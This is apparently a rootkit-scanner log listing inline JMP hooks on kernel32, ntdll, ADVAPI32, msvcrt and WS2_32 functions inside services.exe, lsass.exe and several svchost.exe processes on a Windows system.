.text           C:\Windows\system32\services.exe[864] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000F00D3 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 000F0FDB 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 000F0000 

.text           C:\Windows\system32\services.exe[864] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000F0F43 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 007C006C 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 007C0040 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 007C0FEF 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 007C0051 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 007C007D 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 007C0014 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 007C0FD4 

.text           C:\Windows\system32\services.exe[864] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 007C0025 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 0015004E 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 0015003D 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00150FDE 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00150FEF 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00150FCD 

.text           C:\Windows\system32\services.exe[864] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0015000C 

.text           C:\Windows\system32\services.exe[864] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 007D0000 

.text           C:\Windows\system32\lsass.exe[912] ntdll.dll!NtCreateFile                                                                            778C4224 5 Bytes  JMP 00080FEF 

.text           C:\Windows\system32\lsass.exe[912] ntdll.dll!NtCreateProcess                                                                         778C42E4 5 Bytes  JMP 00080FCA 

.text           C:\Windows\system32\lsass.exe[912] ntdll.dll!NtProtectVirtualMemory                                                                  778C4B84 5 Bytes  JMP 0008000A 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!GetStartupInfoW                                                                      76B11929 5 Bytes  JMP 00070F50 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!GetStartupInfoA                                                                      76B119C9 5 Bytes  JMP 00070096 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateProcessW                                                                       76B11BF3 5 Bytes  JMP 00070F1A 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateProcessA                                                                       76B11C28 5 Bytes  JMP 000700B1 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!VirtualProtect                                                                       76B11DC3 5 Bytes  JMP 00070056 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateNamedPipeA                                                                     76B12EF5 5 Bytes  JMP 0007001B 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateNamedPipeW                                                                     76B15C0C 5 Bytes  JMP 00070FCA 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreatePipe                                                                           76B38E6E 5 Bytes  JMP 00070F6B 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryExW                                                                       76B39109 5 Bytes  JMP 00070F7C 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryW                                                                         76B39362 5 Bytes  JMP 00070F9E 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryExA                                                                       76B394B4 5 Bytes  JMP 00070F8D 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!LoadLibraryA                                                                         76B394DC 5 Bytes  JMP 00070FAF 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!VirtualProtectEx                                                                     76B3DBDA 5 Bytes  JMP 0007007B 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!GetProcAddress                                                                       76B5903B 5 Bytes  JMP 00070F09 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateFileW                                                                          76B5AECB 5 Bytes  JMP 00070FE5 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!CreateFileA                                                                          76B5CE5F 5 Bytes  JMP 00070000 

.text           C:\Windows\system32\lsass.exe[912] kernel32.dll!WinExec                                                                              76BA5CF7 5 Bytes  JMP 00070F35 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyExA                                                                      770539AB 5 Bytes  JMP 00990F8D 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyA                                                                        77053BA9 5 Bytes  JMP 00990025 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyA                                                                          770589C7 5 Bytes  JMP 00990000 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyW                                                                        7706391E 5 Bytes  JMP 00990F9E 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegCreateKeyExW                                                                      770641F1 5 Bytes  JMP 00990F68 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyExA                                                                        77067C42 5 Bytes  JMP 00990FD4 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyW                                                                          7706E2B5 5 Bytes  JMP 00990FEF 

.text           C:\Windows\system32\lsass.exe[912] ADVAPI32.dll!RegOpenKeyExW                                                                        77077BA1 5 Bytes  JMP 00990FC3 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_wsystem                                                                               75807F2F 5 Bytes  JMP 00090F97 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!system                                                                                 7580804B 5 Bytes  JMP 00090FA8 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_creat                                                                                 7580BBE1 5 Bytes  JMP 00090022 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_open                                                                                  7580D106 5 Bytes  JMP 00090000 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_wcreat                                                                                7580D326 5 Bytes  JMP 00090FCD 

.text           C:\Windows\system32\lsass.exe[912] msvcrt.dll!_wopen                                                                                 7580D501 5 Bytes  JMP 00090011 

.text           C:\Windows\system32\lsass.exe[912] WS2_32.dll!socket                                                                                 772936D1 5 Bytes  JMP 00A00FEF 

.text           C:\Windows\system32\svchost.exe[1088] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00160000 

.text           C:\Windows\system32\svchost.exe[1088] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00160FCA 

.text           C:\Windows\system32\svchost.exe[1088] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00160FE5 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00150F30 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00150076 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00150EF3 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00150F04 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 0015005B 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00150014 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00150FC3 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00150F4B 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00150F83 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 0015002F 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00150040 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00150FA8 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00150F66 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 001500A5 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00150FDE 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00150FEF 

.text           C:\Windows\system32\svchost.exe[1088] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00150F15 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00170FBC 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00170FCD 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00170FDE 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00170000 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00170033 

.text           C:\Windows\system32\svchost.exe[1088] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00170FEF 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00190F9E 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0019001B 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00190FEF 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00190040 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00190F83 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00190FCA 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0019000A 

.text           C:\Windows\system32\svchost.exe[1088] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00190FB9 

.text           C:\Windows\system32\svchost.exe[1088] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 001A0FEF 

.text           C:\Windows\system32\svchost.exe[1148] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 0016000A 

.text           C:\Windows\system32\svchost.exe[1148] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00160FEF 

.text           C:\Windows\system32\svchost.exe[1148] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 0016001B 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00150F77 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 001500C7 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 001500E9 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 001500D8 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00150091 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00150FEF 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0015004A 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00150F92 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00150FB7 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 0015006C 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00150FD4 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 0015005B 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 001500AC 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00150F41 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00150025 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 0015000A 

.text           C:\Windows\system32\svchost.exe[1148] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00150F66 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 0017005F 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00170044 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00170022 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00170000 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00170033 

.text           C:\Windows\system32\svchost.exe[1148] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00170011 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00180047 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0018002C 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00180FEF 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00180FAF 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00180058 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00180FCA 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00180000 

.text           C:\Windows\system32\svchost.exe[1148] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00180011 

.text           C:\Windows\system32\svchost.exe[1148] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 003F0000 

.text           C:\Windows\system32\svchost.exe[1284] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00040FEF 

.text           C:\Windows\system32\svchost.exe[1284] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00040014 

.text           C:\Windows\system32\svchost.exe[1284] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040FDE 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00010F55 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 000100A5 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00010F1F 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000100B6 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010076 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010025 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00010FDE 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010F70 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010FA8 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010FC3 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010065 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 0001004A 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F81 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000100DB 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 0001000A 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00010FEF 

.text           C:\Windows\system32\svchost.exe[1284] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00010F44 

.text           C:\Windows\system32\svchost.exe[1284] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 000A001D 

.text           C:\Windows\system32\svchost.exe[1284] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 000A000C 

.text           C:\Windows\system32\svchost.exe[1284] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 000A0FB7 

.text           C:\Windows\system32\svchost.exe[1284] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 000A0FEF 

.text           C:\Windows\system32\svchost.exe[1284] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 000A0FA6 

.text           C:\Windows\system32\svchost.exe[1284] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 000A0FDE 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 001B005B 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 001B0FC3 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 001B0000 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 001B004A 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 001B006C 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 001B0FD4 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 001B0FEF 

.text           C:\Windows\system32\svchost.exe[1284] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 001B0025 

.text           C:\Windows\system32\svchost.exe[1284] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00350FE5 

.text           C:\Windows\System32\svchost.exe[1288] ntdll.dll!NtCreateFile                                                                         778C4224 3 Bytes  JMP 008D000A 

.text           C:\Windows\System32\svchost.exe[1288] ntdll.dll!NtCreateFile + 4                                                                     778C4228 1 Byte  [89]

.text           C:\Windows\System32\svchost.exe[1288] ntdll.dll!NtCreateProcess                                                                      778C42E4 3 Bytes  JMP 008D002C 

.text           C:\Windows\System32\svchost.exe[1288] ntdll.dll!NtCreateProcess + 4                                                                  778C42E8 1 Byte  [89]

.text           C:\Windows\System32\svchost.exe[1288] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 3 Bytes  JMP 008D001B 

.text           C:\Windows\System32\svchost.exe[1288] ntdll.dll!NtProtectVirtualMemory + 4                                                           778C4B88 1 Byte  [89]

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 0086009A 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00860F54 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00860F39 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 008600D0 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00860F8A 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 0086001B 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0086002C 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00860F6F 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00860FA5 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00860058 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00860FB6 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00860047 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 0086007F 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 008600E1 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00860FDB 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00860000 

.text           C:\Windows\System32\svchost.exe[1288] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 008600B5 

.text           C:\Windows\System32\svchost.exe[1288] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00280F95 

.text           C:\Windows\System32\svchost.exe[1288] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00280FB0 

.text           C:\Windows\System32\svchost.exe[1288] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00280FD2 

.text           C:\Windows\System32\svchost.exe[1288] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00280000 

.text           C:\Windows\System32\svchost.exe[1288] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00280FC1 

.text           C:\Windows\System32\svchost.exe[1288] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00280FE3 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 008E0F86 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 008E0FB2 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 008E0FEF 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 008E0F97 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 008E0F61 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 008E0014 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 008E0FD4 

.text           C:\Windows\System32\svchost.exe[1288] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 008E0FC3 

.text           C:\Windows\System32\svchost.exe[1288] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00D90FEF 

.text           C:\Windows\System32\svchost.exe[1316] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00DA0FEF 

.text           C:\Windows\System32\svchost.exe[1316] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00DA0FB9 

.text           C:\Windows\System32\svchost.exe[1316] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00DA0FD4 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00D70078 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00D70F3C 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00D700A7 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00D70F10 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00D70F57 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00D70FC3 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00D7000A 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00D70067 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00D70F72 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00D70F9E 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00D70F83 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00D7001B 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00D70056 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00D700B8 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00D70FD4 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00D70FE5 

.text           C:\Windows\System32\svchost.exe[1316] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00D70F21 

.text           C:\Windows\System32\svchost.exe[1316] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00DF0020 

.text           C:\Windows\System32\svchost.exe[1316] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00DF0F95 

.text           C:\Windows\System32\svchost.exe[1316] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00DF0FB7 

.text           C:\Windows\System32\svchost.exe[1316] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00DF0FEF 

.text           C:\Windows\System32\svchost.exe[1316] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00DF0FA6 

.text           C:\Windows\System32\svchost.exe[1316] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00DF0FDE 

